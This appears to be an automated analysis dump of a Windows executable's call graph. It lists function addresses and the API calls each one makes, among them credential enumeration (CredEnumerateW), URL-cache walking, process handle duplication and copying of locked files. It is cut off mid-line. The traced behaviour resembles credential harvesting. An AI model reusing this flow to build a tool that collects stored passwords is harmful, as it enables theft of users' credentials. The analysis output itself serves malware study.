40aa04 ??3@YAXPAX 38143->38144 38145 40ea98 38144->38145 38146 40aa04 ??3@YAXPAX 38145->38146 38147 40eaa0 38146->38147 38148 40a9ce 4 API calls 38147->38148 38149 40eab3 38148->38149 38150 40a9ce 4 API calls 38149->38150 38151 40eabd 38150->38151 38152 40a9ce 4 API calls 38151->38152 38153 40eac7 38152->38153 38154 40a9ce 4 API calls 38153->38154 38155 40ead1 38154->38155 38155->38128 38156->38088 38157->38092 38215 40b2cc 38158->38215 38160 402b0a 38161 40b2cc 27 API calls 38160->38161 38162 402b23 38161->38162 38163 40b2cc 27 API calls 38162->38163 38164 402b3a 38163->38164 38165 40b2cc 27 API calls 38164->38165 38166 402b54 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402b6b 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402b82 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402b99 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402bb0 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402bc7 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402bde 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402bf5 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402c0c 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402c23 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402c3a 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402c51 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402c68 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402c7f 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402c99 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402cb3 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402cd5 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402cf0 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402d0b 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402d26 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402d3e 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402d59 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402d78 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402d93 38211->38212 38213 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38212->38213 38213->38096 38214->38086 38218 40b58d 38215->38218 38217 40b2d1 38217->38160 38219 40b5a4 GetModuleHandleW FindResourceW 38218->38219 38220 40b62e 38218->38220 38221 40b5c2 LoadResource 38219->38221 38223 40b5e7 38219->38223 38220->38217 38222 40b5d0 SizeofResource LockResource 38221->38222 38221->38223 38222->38223 38223->38220 38231 40afcf 38223->38231 38225 40b608 memcpy 38234 40b4d3 memcpy 38225->38234 38227 40b61e 38235 40b3c1 18 API calls 38227->38235 38229 40b626 38236 40b04b 38229->38236 38232 40b04b ??3@YAXPAX 38231->38232 38233 40afd7 ??2@YAPAXI 38232->38233 38233->38225 38234->38227 38235->38229 38237 40b051 ??3@YAXPAX 38236->38237 38238 40b05f 38236->38238 38237->38238 38238->38220 38239->38104 38241 4032c4 38240->38241 38242 40b633 ??3@YAXPAX 38241->38242 38243 403316 38242->38243 38262 44553b 38243->38262 38247 403480 38458 40368c 15 API calls 38247->38458 38249 403489 38250 40b633 ??3@YAXPAX 38249->38250 38252 403495 38250->38252 38251 40333c 38251->38247 38253 4033a9 memset memcpy 38251->38253 38254 4033ec wcscmp 38251->38254 38456 4028e7 11 API calls 38251->38456 38457 40f508 6 API calls 38251->38457 38252->38106 38253->38251 38253->38254 38254->38251 38257 403421 _wcsicmp 38257->38251 38259 444a64 FreeLibrary 38258->38259 38260 444a83 38258->38260 38259->38260 38260->38106 38261->38107 38263 445548 38262->38263 38264 445599 38263->38264 38459 40c768 38263->38459 38265 4455a8 memset 38264->38265 38272 4457f2 38264->38272 38542 403988 38265->38542 38275 445854 38272->38275 38644 403e2d memset memset memset memset memset 38272->38644 38273 4455e5 38284 445672 38273->38284 38289 44560f 38273->38289 38274 4458bb memset memset 38277 414c2e 17 API calls 38274->38277 38326 4458aa 38275->38326 38667 403c9c memset memset memset memset memset 38275->38667 38280 4458f9 38277->38280 38279 44595e memset memset 38287 414c2e 17 API calls 38279->38287 38288 40b2cc 27 API calls 38280->38288 38282 44558c 38526 444b06 38282->38526 38283 44557a 38283->38282 38740 41366b FreeLibrary 38283->38740 38553 403fbe memset memset memset memset memset 38284->38553 38285 445a00 memset memset 38690 414c2e 38285->38690 38286 445b22 38291 445bca 38286->38291 38292 445b38 memset memset memset 38286->38292 38296 44599c 38287->38296 38298 445909 38288->38298 38300 4087b3 338 API calls 38289->38300 38290 445849 38755 40b1ab ??3@YAXPAX ??3@YAXPAX 38290->38755 38299 445c8b memset memset 38291->38299 38364 445cf0 38291->38364 38302 445bd4 38292->38302 38303 445b98 38292->38303 38297 40b2cc 27 API calls 38296->38297 38310 4459ac 38297->38310 38307 409d1f 6 API calls 38298->38307 38311 414c2e 17 API calls 38299->38311 38308 445621 38300->38308 38301 44589f 38756 40b1ab ??3@YAXPAX ??3@YAXPAX 38301->38756 38317 414c2e 17 API calls 38302->38317 38303->38302 38313 445ba2 38303->38313 38306 403335 38455 4452e5 45 API calls 38306->38455 38321 445919 38307->38321 38741 4454bf 20 API calls 38308->38741 38309 445823 38309->38290 38331 4087b3 338 API calls 38309->38331 38322 409d1f 6 API calls 38310->38322 38323 445cc9 38311->38323 38828 4099c6 wcslen 38313->38828 38314 4456b2 38743 40b1ab ??3@YAXPAX ??3@YAXPAX 38314->38743 38316 40b2cc 27 API calls 38327 445a4f 38316->38327 38318 445be2 38317->38318 38329 40b2cc 27 API calls 38318->38329 38319 445d3d 38349 40b2cc 27 API calls 38319->38349 38320 445d88 memset memset memset 38332 414c2e 17 API calls 38320->38332 38757 409b98 GetFileAttributesW 38321->38757 38333 4459bc 38322->38333 38334 409d1f 6 API calls 38323->38334 38324 445879 38324->38301 38345 4087b3 338 API calls 38324->38345 38326->38274 38350 44594a 38326->38350 38706 409d1f wcslen wcslen 38327->38706 38339 445bf3 38329->38339 38331->38309 38342 445dde 38332->38342 38824 409b98 GetFileAttributesW 38333->38824 38344 445ce1 38334->38344 38335 445bb3 38831 445403 memset 38335->38831 38336 445680 38336->38314 38576 4087b3 memset 38336->38576 38348 409d1f 6 API calls 38339->38348 38340 445928 38340->38350 38758 40b6ef 38340->38758 38351 40b2cc 27 API calls 38342->38351 38848 409b98 GetFileAttributesW 38344->38848 38345->38324 38347 40b2cc 27 API calls 38356 445a94 38347->38356 38358 445c07 38348->38358 38359 445d54 _wcsicmp 38349->38359 38350->38279 38363 4459ed 38350->38363 38362 445def 38351->38362 38352 4459cb 38352->38363 38372 40b6ef 253 API calls 38352->38372 38711 40ae18 38356->38711 38357 44566d 38357->38272 38627 413d4c 38357->38627 38368 445389 259 API calls 38358->38368 38369 445d71 38359->38369 38432 445d67 38359->38432 38361 445665 38742 40b1ab ??3@YAXPAX ??3@YAXPAX 38361->38742 38370 409d1f 6 API calls 38362->38370 38363->38285 38363->38286 38364->38306 38364->38319 38364->38320 38365 445389 259 API calls 38365->38291 38374 445c17 38368->38374 38849 445093 23 API calls 38369->38849 38377 445e03 38370->38377 38372->38363 38373 4456d8 38379 40b2cc 27 API calls 38373->38379 38380 40b2cc 27 API calls 38374->38380 38376 44563c 38376->38361 38382 4087b3 338 API calls 38376->38382 38850 409b98 GetFileAttributesW 38377->38850 38378 40b6ef 253 API calls 38378->38306 38384 4456e2 38379->38384 38385 445c23 38380->38385 38381 445d83 38381->38306 38382->38376 38744 413fa6 _wcsicmp _wcsicmp 38384->38744 38389 409d1f 6 API calls 38385->38389 38387 445e12 38394 445e6b 38387->38394 38401 40b2cc 27 API calls 38387->38401 38392 445c37 38389->38392 38390 445aa1 38393 445b17 38390->38393 38408 445ab2 memset 38390->38408 38421 409d1f 6 API calls 38390->38421 38718 40add4 38390->38718 38723 445389 38390->38723 38732 40ae51 38390->38732 38391 4456eb 38397 4456fd memset memset memset memset 38391->38397 38398 4457ea 38391->38398 38399 445389 259 API calls 38392->38399 38825 40aebe 38393->38825 38852 445093 23 API calls 38394->38852 38745 409c70 wcscpy wcsrchr 38397->38745 38748 413d29 38398->38748 38404 445c47 38399->38404 38405 445e33 38401->38405 38402 445e7e 38407 445f67 38402->38407 38410 40b2cc 27 API calls 38404->38410 38411 409d1f 6 API calls 38405->38411 38416 40b2cc 27 API calls 38407->38416 38412 40b2cc 27 API calls 38408->38412 38414 445c53 38410->38414 38415 445e47 38411->38415 38412->38390 38413 409c70 2 API calls 38417 44577e 38413->38417 38418 409d1f 6 API calls 38414->38418 38851 409b98 GetFileAttributesW 38415->38851 38420 445f73 38416->38420 38422 409c70 2 API calls 38417->38422 38423 445c67 38418->38423 38425 409d1f 6 API calls 38420->38425 38421->38390 38426 44578d 38422->38426 38427 445389 259 API calls 38423->38427 38424 445e56 38424->38394 38430 445e83 memset 38424->38430 38428 445f87 38425->38428 38426->38398 38434 40b2cc 27 API calls 38426->38434 38427->38291 38855 409b98 GetFileAttributesW 38428->38855 38433 40b2cc 27 API calls 38430->38433 38432->38306 38432->38378 38435 445eab 38433->38435 38436 4457a8 38434->38436 38437 409d1f 6 API calls 38435->38437 38438 409d1f 6 API calls 38436->38438 38439 445ebf 38437->38439 38440 4457b8 38438->38440 38441 40ae18 9 API calls 38439->38441 38747 409b98 GetFileAttributesW 38440->38747 38451 445ef5 38441->38451 38443 4457c7 38443->38398 38445 4087b3 338 API calls 38443->38445 38444 40ae51 9 API calls 38444->38451 38445->38398 38446 445f5c 38448 40aebe FindClose 38446->38448 38447 40add4 2 API calls 38447->38451 38448->38407 38449 40b2cc 27 API calls 38449->38451 38450 409d1f 6 API calls 38450->38451 38451->38444 38451->38446 38451->38447 38451->38449 38451->38450 38453 445f3a 38451->38453 38853 409b98 GetFileAttributesW 38451->38853 38854 445093 23 API calls 38453->38854 38455->38251 38456->38257 38457->38251 38458->38249 38460 40c775 38459->38460 38856 40b1ab ??3@YAXPAX ??3@YAXPAX 38460->38856 38462 40c788 38857 40b1ab ??3@YAXPAX ??3@YAXPAX 38462->38857 38464 40c790 38858 40b1ab ??3@YAXPAX ??3@YAXPAX 38464->38858 38466 40c798 38467 40aa04 ??3@YAXPAX 38466->38467 38468 40c7a0 38467->38468 38859 40c274 memset 38468->38859 38473 40a8ab 9 API calls 38474 40c7c3 38473->38474 38475 40a8ab 9 API calls 38474->38475 38476 40c7d0 38475->38476 38888 40c3c3 38476->38888 38480 40c877 38489 40bdb0 38480->38489 38481 40c86c 38930 4053fe 39 API calls 38481->38930 38487 40c7e5 38487->38480 38487->38481 38488 40c634 50 API calls 38487->38488 38913 40a706 38487->38913 38488->38487 39193 404363 38489->39193 38492 40bf5d 39213 40440c 38492->39213 38494 40bdee 38494->38492 38497 40b2cc 27 API calls 38494->38497 38495 40bddf CredEnumerateW 38495->38494 38498 40be02 wcslen 38497->38498 38498->38492 38503 40be1e 38498->38503 38499 40be26 _wcsncoll 38499->38503 38502 40be7d memset 38502->38503 38504 40bea7 memcpy 38502->38504 38503->38492 38503->38499 38503->38502 38503->38504 38505 40bf11 wcschr 38503->38505 38506 40b2cc 27 API calls 38503->38506 38508 40bf43 LocalFree 38503->38508 39216 40bd5d 28 API calls 38503->39216 39217 404423 38503->39217 38504->38503 38504->38505 38505->38503 38507 40bef6 _wcsnicmp 38506->38507 38507->38503 38507->38505 38508->38503 38509 4135f7 39232 4135e0 38509->39232 38512 40b2cc 27 API calls 38513 41360d 38512->38513 38514 40a804 8 API calls 38513->38514 38515 413613 38514->38515 38516 41361b 38515->38516 38517 41363e 38515->38517 38518 40b273 27 API calls 38516->38518 38519 4135e0 FreeLibrary 38517->38519 38520 413625 GetProcAddress 38518->38520 38521 413643 38519->38521 38520->38517 38522 413648 38520->38522 38521->38283 38523 413658 38522->38523 38524 4135e0 FreeLibrary 38522->38524 38523->38283 38525 413666 38524->38525 38525->38283 39235 4449b9 38526->39235 38529 444c1f 38529->38264 38530 4449b9 42 API calls 38532 444b4b 38530->38532 38531 444c15 38534 4449b9 42 API calls 38531->38534 38532->38531 39256 444972 GetVersionExW 38532->39256 38534->38529 38535 444b99 memcmp 38540 444b8c 38535->38540 38536 444c0b 39260 444a85 42 API calls 38536->39260 38540->38535 38540->38536 39257 444aa5 42 API calls 38540->39257 39258 40a7a0 GetVersionExW 38540->39258 39259 444a85 42 API calls 38540->39259 38543 40399d 38542->38543 39261 403a16 38543->39261 38545 403a09 39275 40b1ab ??3@YAXPAX ??3@YAXPAX 38545->39275 38547 403a12 wcsrchr 38547->38273 38548 4039a3 38548->38545 38551 4039f4 38548->38551 39272 40a02c CreateFileW 38548->39272 38551->38545 38552 4099c6 2 API calls 38551->38552 38552->38545 38554 414c2e 17 API calls 38553->38554 38555 404048 38554->38555 38556 414c2e 17 API calls 38555->38556 38557 404056 38556->38557 38558 409d1f 6 API calls 38557->38558 38559 404073 38558->38559 38560 409d1f 6 API calls 38559->38560 38561 40408e 38560->38561 38562 409d1f 6 API calls 38561->38562 38563 4040a6 38562->38563 38564 403af5 20 API calls 38563->38564 38565 4040ba 38564->38565 38566 403af5 20 API calls 38565->38566 38567 4040cb 38566->38567 39302 40414f memset 38567->39302 38569 404140 39316 40b1ab ??3@YAXPAX ??3@YAXPAX 38569->39316 38570 4040ec memset 38574 4040e0 38570->38574 38572 404148 38572->38336 38573 4099c6 2 API calls 38573->38574 38574->38569 38574->38570 38574->38573 38575 40a8ab 9 API calls 38574->38575 38575->38574 39329 40a6e6 WideCharToMultiByte 38576->39329 38578 4087ed 39330 4095d9 memset 38578->39330 38581 408809 memset memset memset memset memset 38582 40b2cc 27 API calls 38581->38582 38583 4088a1 38582->38583 38584 409d1f 6 API calls 38583->38584 38585 4088b1 38584->38585 38586 40b2cc 27 API calls 38585->38586 38587 4088c0 38586->38587 38588 409d1f 6 API calls 38587->38588 38589 4088d0 38588->38589 38590 40b2cc 27 API calls 38589->38590 38591 4088df 38590->38591 38592 409d1f 6 API calls 38591->38592 38593 4088ef 38592->38593 38594 40b2cc 27 API calls 38593->38594 38595 4088fe 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 40890e 38596->38597 38598 40b2cc 27 API calls 38597->38598 38599 40891d 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 40892d 38600->38601 38609 408953 38609->38336 38628 40b633 ??3@YAXPAX 38627->38628 38629 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38628->38629 38630 413f00 Process32NextW 38629->38630 38631 413da5 OpenProcess 38630->38631 38632 413f17 CloseHandle 38630->38632 38633 413eb0 38631->38633 38634 413df3 memset 38631->38634 38632->38373 38633->38630 38636 413ebf ??3@YAXPAX 38633->38636 38637 4099f4 3 API calls 38633->38637 39758 413f27 38634->39758 38636->38633 38637->38633 38638 413e1f 38639 413e37 GetModuleHandleW 38638->38639 39763 413959 38638->39763 39779 413ca4 38638->39779 38639->38638 38641 413e46 GetProcAddress 38639->38641 38641->38638 38643 413ea2 CloseHandle 38643->38633 38645 414c2e 17 API calls 38644->38645 38646 403eb7 38645->38646 38647 414c2e 17 API calls 38646->38647 38648 403ec5 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 403ee2 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 403efd 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 403f15 38653->38654 38655 403af5 20 API calls 38654->38655 38656 403f29 38655->38656 38657 403af5 20 API calls 38656->38657 38658 403f3a 38657->38658 38659 40414f 33 API calls 38658->38659 38665 403f4f 38659->38665 38660 403faf 39793 40b1ab ??3@YAXPAX ??3@YAXPAX 38660->39793 38661 403f5b memset 38661->38665 38663 403fb7 38663->38309 38664 4099c6 2 API calls 38664->38665 38665->38660 38665->38661 38665->38664 38666 40a8ab 9 API calls 38665->38666 38666->38665 38668 414c2e 17 API calls 38667->38668 38669 403d26 38668->38669 38670 414c2e 17 API calls 38669->38670 38671 403d34 38670->38671 38672 409d1f 6 API calls 38671->38672 38673 403d51 38672->38673 38674 409d1f 6 API calls 38673->38674 38675 403d6c 38674->38675 38676 409d1f 6 API calls 38675->38676 38677 403d84 38676->38677 38678 403af5 20 API calls 38677->38678 38679 403d98 38678->38679 38680 403af5 20 API calls 38679->38680 38681 403da9 38680->38681 38682 40414f 33 API calls 38681->38682 38683 403dbe 38682->38683 38684 403e1e 38683->38684 38686 403dca memset 38683->38686 38688 4099c6 2 API calls 38683->38688 38689 40a8ab 9 API calls 38683->38689 39794 40b1ab ??3@YAXPAX ??3@YAXPAX 38684->39794 38686->38683 38687 403e26 38687->38324 38688->38683 38689->38683 38691 414b81 9 API calls 38690->38691 38692 414c40 38691->38692 38693 414c73 memset 38692->38693 39795 409cea 38692->39795 38694 414c94 38693->38694 39798 414592 RegOpenKeyExW 38694->39798 38698 414c64 SHGetSpecialFolderPathW 38700 414d0b 38698->38700 38699 414cc1 38701 414cf4 wcscpy 38699->38701 39799 414bb0 wcscpy 38699->39799 38700->38316 38701->38700 38703 414cd2 39800 4145ac RegQueryValueExW 38703->39800 38705 414ce9 RegCloseKey 38705->38701 38707 409d62 38706->38707 38708 409d43 wcscpy 38706->38708 38707->38347 38709 409719 2 API calls 38708->38709 38710 409d51 wcscat 38709->38710 38710->38707 38712 40aebe FindClose 38711->38712 38713 40ae21 38712->38713 38714 4099c6 2 API calls 38713->38714 38715 40ae35 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 40ae49 38716->38717 38717->38390 38719 40ade0 38718->38719 38722 40ae0f 38718->38722 38720 40ade7 wcscmp 38719->38720 38719->38722 38721 40adfe wcscmp 38720->38721 38720->38722 38721->38722 38722->38390 38724 40ae18 9 API calls 38723->38724 38725 4453c4 38724->38725 38726 40ae51 9 API calls 38725->38726 38727 4453f3 38725->38727 38728 40add4 2 API calls 38725->38728 38731 445403 254 API calls 38725->38731 38726->38725 38729 40aebe FindClose 38727->38729 38728->38725 38730 4453fe 38729->38730 38730->38390 38731->38725 38733 40ae7b FindNextFileW 38732->38733 38734 40ae5c FindFirstFileW 38732->38734 38735 40ae94 38733->38735 38736 40ae8f 38733->38736 38734->38735 38738 40aeb6 38735->38738 38739 409d1f 6 API calls 38735->38739 38737 40aebe FindClose 38736->38737 38737->38735 38738->38390 38739->38738 38740->38282 38741->38376 38742->38357 38743->38357 38744->38391 38746 409c89 38745->38746 38746->38413 38747->38443 38749 413d39 38748->38749 38750 413d2f FreeLibrary 38748->38750 38751 40b633 ??3@YAXPAX 38749->38751 38750->38749 38752 413d42 38751->38752 38753 40b633 ??3@YAXPAX 38752->38753 38754 413d4a 38753->38754 38754->38272 38755->38275 38756->38326 38757->38340 38759 44db70 38758->38759 38760 40b6fc memset 38759->38760 38761 409c70 2 API calls 38760->38761 38762 40b732 wcsrchr 38761->38762 38763 40b743 38762->38763 38764 40b746 memset 38762->38764 38763->38764 38765 40b2cc 27 API calls 38764->38765 38766 40b76f 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 40b783 38767->38768 39801 409b98 GetFileAttributesW 38768->39801 38770 40b792 38771 40b7c2 38770->38771 38772 409c70 2 API calls 38770->38772 39802 40bb98 38771->39802 38774 40b7a5 38772->38774 38776 40b2cc 27 API calls 38774->38776 38780 40b7b2 38776->38780 38777 40b837 FindCloseChangeNotification 38779 40b83e memset 38777->38779 38778 40b817 38781 409a45 3 API calls 38778->38781 39835 40a6e6 WideCharToMultiByte 38779->39835 38784 409d1f 6 API calls 38780->38784 38782 40b827 CopyFileW 38781->38782 38782->38779 38784->38771 38785 40b866 38786 444432 121 API calls 38785->38786 38787 40b879 38786->38787 38788 40bad5 38787->38788 38789 40b273 27 API calls 38787->38789 38790 40baeb 38788->38790 38791 40bade DeleteFileW 38788->38791 38792 40b89a 38789->38792 38793 40b04b ??3@YAXPAX 38790->38793 38791->38790 38794 438552 134 API calls 38792->38794 38795 40baf3 38793->38795 38796 40b8a4 38794->38796 38795->38350 38797 40bacd 38796->38797 38799 4251c4 137 API calls 38796->38799 38798 443d90 111 API calls 38797->38798 38798->38788 38822 40b8b8 38799->38822 38800 40bac6 39845 424f26 123 API calls 38800->39845 38801 40b8bd memset 39836 425413 17 API calls 38801->39836 38804 425413 17 API calls 38804->38822 38807 40a71b MultiByteToWideChar 38807->38822 38808 40a734 MultiByteToWideChar 38808->38822 38811 40b9b5 memcmp 38811->38822 38812 4099c6 2 API calls 38812->38822 38813 404423 38 API calls 38813->38822 38816 40bb3e memset memcpy 39846 40a734 MultiByteToWideChar 38816->39846 38817 4251c4 137 API calls 38817->38822 38819 40bb88 LocalFree 38819->38822 38822->38800 38822->38801 38822->38804 38822->38807 38822->38808 38822->38811 38822->38812 38822->38813 38822->38816 38822->38817 38823 40ba5f memcmp 38822->38823 39837 4253ef 16 API calls 38822->39837 39838 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38822->39838 39839 4253af 17 API calls 38822->39839 39840 4253cf 17 API calls 38822->39840 39841 447280 memset 38822->39841 39842 447960 memset memcpy memcpy memcpy 38822->39842 39843 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38822->39843 39844 447920 memcpy memcpy memcpy 38822->39844 38823->38822 38824->38352 38826 40aed1 38825->38826 38827 40aec7 FindClose 38825->38827 38826->38286 38827->38826 38829 4099d7 38828->38829 38830 4099da memcpy 38828->38830 38829->38830 38830->38335 38832 40b2cc 27 API calls 38831->38832 38833 44543f 38832->38833 38834 409d1f 6 API calls 38833->38834 38835 44544f 38834->38835 39930 409b98 GetFileAttributesW 38835->39930 38837 44545e 38838 445476 38837->38838 38839 40b6ef 253 API calls 38837->38839 38840 40b2cc 27 API calls 38838->38840 38839->38838 38841 445482 38840->38841 38842 409d1f 6 API calls 38841->38842 38843 445492 38842->38843 39931 409b98 GetFileAttributesW 38843->39931 38845 4454a1 38846 4454b9 38845->38846 38847 40b6ef 253 API calls 38845->38847 38846->38365 38847->38846 38848->38364 38849->38381 38850->38387 38851->38424 38852->38402 38853->38451 38854->38451 38855->38432 38856->38462 38857->38464 38858->38466 38860 414c2e 17 API calls 38859->38860 38861 40c2ae 38860->38861 38931 40c1d3 38861->38931 38866 40c3be 38883 40a8ab 38866->38883 38867 40afcf 2 API calls 38868 40c2fd FindFirstUrlCacheEntryW 38867->38868 38869 40c3b6 38868->38869 38870 40c31e wcschr 38868->38870 38871 40b04b ??3@YAXPAX 38869->38871 38872 40c331 38870->38872 38873 40c35e FindNextUrlCacheEntryW 38870->38873 38871->38866 38875 40a8ab 9 API calls 38872->38875 38873->38870 38874 40c373 GetLastError 38873->38874 38876 40c3ad FindCloseUrlCache 38874->38876 38877 40c37e 38874->38877 38878 40c33e wcschr 38875->38878 38876->38869 38879 40afcf 2 API calls 38877->38879 38878->38873 38880 40c34f 38878->38880 38881 40c391 FindNextUrlCacheEntryW 38879->38881 38882 40a8ab 9 API calls 38880->38882 38881->38870 38881->38876 38882->38873 39120 40a97a 38883->39120 38886 40a8cc 38886->38473 38887 40a8d0 7 API calls 38887->38886 39125 40b1ab ??3@YAXPAX ??3@YAXPAX 38888->39125 38890 40c3dd 38891 40b2cc 27 API calls 38890->38891 38892 40c3e7 38891->38892 39126 414592 RegOpenKeyExW 38892->39126 38894 40c3f4 38895 40c50e 38894->38895 38896 40c3ff 38894->38896 38910 405337 38895->38910 38897 40a9ce 4 API calls 38896->38897 38898 40c418 memset 38897->38898 39127 40aa1d 38898->39127 38901 40c471 38903 40c47a _wcsupr 38901->38903 38902 40c505 RegCloseKey 38902->38895 38904 40a8d0 7 API calls 38903->38904 38905 40c498 38904->38905 38906 40a8d0 7 API calls 38905->38906 38907 40c4ac memset 38906->38907 38908 40aa1d 38907->38908 38909 40c4e4 RegEnumValueW 38908->38909 38909->38902 38909->38903 39129 405220 38910->39129 38914 4099c6 2 API calls 38913->38914 38915 40a714 _wcslwr 38914->38915 38916 40c634 38915->38916 39186 405361 38916->39186 38919 40c65c wcslen 39189 4053b6 39 API calls 38919->39189 38920 40c71d wcslen 38920->38487 38922 40c677 38923 40c713 38922->38923 39190 40538b 39 API calls 38922->39190 39192 4053df 39 API calls 38923->39192 38926 40c6a5 38926->38923 38927 40c6a9 memset 38926->38927 38928 40c6d3 38927->38928 39191 40c589 44 API calls 38928->39191 38930->38480 38932 40ae18 9 API calls 38931->38932 38938 40c210 38932->38938 38933 40ae51 9 API calls 38933->38938 38934 40c264 38935 40aebe FindClose 38934->38935 38937 40c26f 38935->38937 38936 40add4 2 API calls 38936->38938 38943 40e5ed memset memset 38937->38943 38938->38933 38938->38934 38938->38936 38939 40c231 _wcsicmp 38938->38939 38940 40c1d3 35 API calls 38938->38940 38939->38938 38941 40c248 38939->38941 38940->38938 38956 40c084 22 API calls 38941->38956 38944 414c2e 17 API calls 38943->38944 38945 40e63f 38944->38945 38946 409d1f 6 API calls 38945->38946 38947 40e658 38946->38947 38957 409b98 GetFileAttributesW 38947->38957 38949 40e667 38950 40e680 38949->38950 38951 409d1f 6 API calls 38949->38951 38958 409b98 GetFileAttributesW 38950->38958 38951->38950 38953 40e68f 38954 40c2d8 38953->38954 38959 40e4b2 38953->38959 38954->38866 38954->38867 38956->38938 38957->38949 38958->38953 38980 40e01e 38959->38980 38961 40e593 38962 40e5b0 38961->38962 38963 40e59c DeleteFileW 38961->38963 38964 40b04b ??3@YAXPAX 38962->38964 38963->38962 38966 40e5bb 38964->38966 38965 40e521 38965->38961 39003 40e175 38965->39003 38968 40e5c4 CloseHandle 38966->38968 38969 40e5cc 38966->38969 38968->38969 38971 40b633 ??3@YAXPAX 38969->38971 38970 40e573 38972 40e584 38970->38972 38973 40e57c FindCloseChangeNotification 38970->38973 38974 40e5db 38971->38974 39046 40b1ab ??3@YAXPAX ??3@YAXPAX 38972->39046 38973->38972 38977 40b633 ??3@YAXPAX 38974->38977 38976 40e540 38976->38970 39023 40e2ab 38976->39023 38978 40e5e3 38977->38978 38978->38954 39047 406214 38980->39047 38983 40e16b 38983->38965 38986 40afcf 2 API calls 38987 40e08d OpenProcess 38986->38987 38988 40e0a4 GetCurrentProcess DuplicateHandle 38987->38988 38992 40e152 38987->38992 38989 40e0d0 GetFileSize 38988->38989 38990 40e14a CloseHandle 38988->38990 39083 409a45 GetTempPathW 38989->39083 38990->38992 38991 40e160 38995 40b04b ??3@YAXPAX 38991->38995 38992->38991 38994 406214 22 API calls 38992->38994 38994->38991 38995->38983 38996 40e0ea 39086 4096dc CreateFileW 38996->39086 38998 40e0f1 CreateFileMappingW 38999 40e140 CloseHandle CloseHandle 38998->38999 39000 40e10b MapViewOfFile 38998->39000 38999->38990 39001 40e13b FindCloseChangeNotification 39000->39001 39002 40e11f WriteFile UnmapViewOfFile 39000->39002 39001->38999 39002->39001 39004 40e18c 39003->39004 39087 406b90 39004->39087 39007 40e1a7 memset 39013 40e1e8 39007->39013 39008 40e299 39097 4069a3 39008->39097 39014 40e283 39013->39014 39015 40dd50 _wcsicmp 39013->39015 39021 40e244 _snwprintf 39013->39021 39104 406e8f 13 API calls 39013->39104 39105 40742e 8 API calls 39013->39105 39106 40aae3 wcslen wcslen _memicmp 39013->39106 39107 406b53 SetFilePointerEx ReadFile 39013->39107 39016 40e291 39014->39016 39017 40e288 ??3@YAXPAX 39014->39017 39015->39013 39018 40aa04 ??3@YAXPAX 39016->39018 39017->39016 39018->39008 39022 40a8d0 7 API calls 39021->39022 39022->39013 39024 40e2c2 39023->39024 39025 406b90 11 API calls 39024->39025 39031 40e2d3 39025->39031 39026 40e4a0 39027 4069a3 2 API calls 39026->39027 39029 40e4ab 39027->39029 39029->38976 39031->39026 39032 40e489 39031->39032 39035 40dd50 _wcsicmp 39031->39035 39041 40e3e0 memcpy 39031->39041 39042 40e3fb memcpy 39031->39042 39043 40e3b3 wcschr 39031->39043 39044 40e416 memcpy 39031->39044 39045 40e431 memcpy 39031->39045 39108 406e8f 13 API calls 39031->39108 39109 40dd50 _wcsicmp 39031->39109 39118 40742e 8 API calls 39031->39118 39119 406b53 SetFilePointerEx ReadFile 39031->39119 39033 40aa04 ??3@YAXPAX 39032->39033 39034 40e491 39033->39034 39034->39026 39036 40e497 ??3@YAXPAX 39034->39036 39035->39031 39036->39026 39038 40e376 memset 39110 40aa29 39038->39110 39041->39031 39042->39031 39043->39031 39044->39031 39045->39031 39046->38961 39048 406294 CloseHandle 39047->39048 39049 406224 39048->39049 39050 4096c3 CreateFileW 39049->39050 39051 40622d 39050->39051 39052 406281 GetLastError 39051->39052 39054 40a2ef ReadFile 39051->39054 39053 40625a 39052->39053 39053->38983 39058 40dd85 memset 39053->39058 39055 406244 39054->39055 39055->39052 39056 40624b 39055->39056 39056->39053 39057 406777 19 API calls 39056->39057 39057->39053 39059 409bca GetModuleFileNameW 39058->39059 39060 40ddbe CreateFileW 39059->39060 39063 40ddf1 39060->39063 39061 40afcf ??2@YAPAXI ??3@YAXPAX 39061->39063 39062 41352f 9 API calls 39062->39063 39063->39061 39063->39062 39064 40de0b NtQuerySystemInformation 39063->39064 39065 40de3b FindCloseChangeNotification GetCurrentProcessId 39063->39065 39064->39063 39066 40de54 39065->39066 39067 413d4c 46 API calls 39066->39067 39075 40de88 39067->39075 39068 40e00c 39069 413d29 ??3@YAXPAX FreeLibrary 39068->39069 39070 40e014 39069->39070 39070->38983 39070->38986 39071 40dea9 _wcsicmp 39072 40dee7 OpenProcess 39071->39072 39073 40debd _wcsicmp 39071->39073 39072->39075 39073->39072 39074 40ded0 _wcsicmp 39073->39074 39074->39072 39074->39075 39075->39068 39075->39071 39076 40dfef CloseHandle 39075->39076 39077 40df23 GetCurrentProcess DuplicateHandle 39075->39077 39080 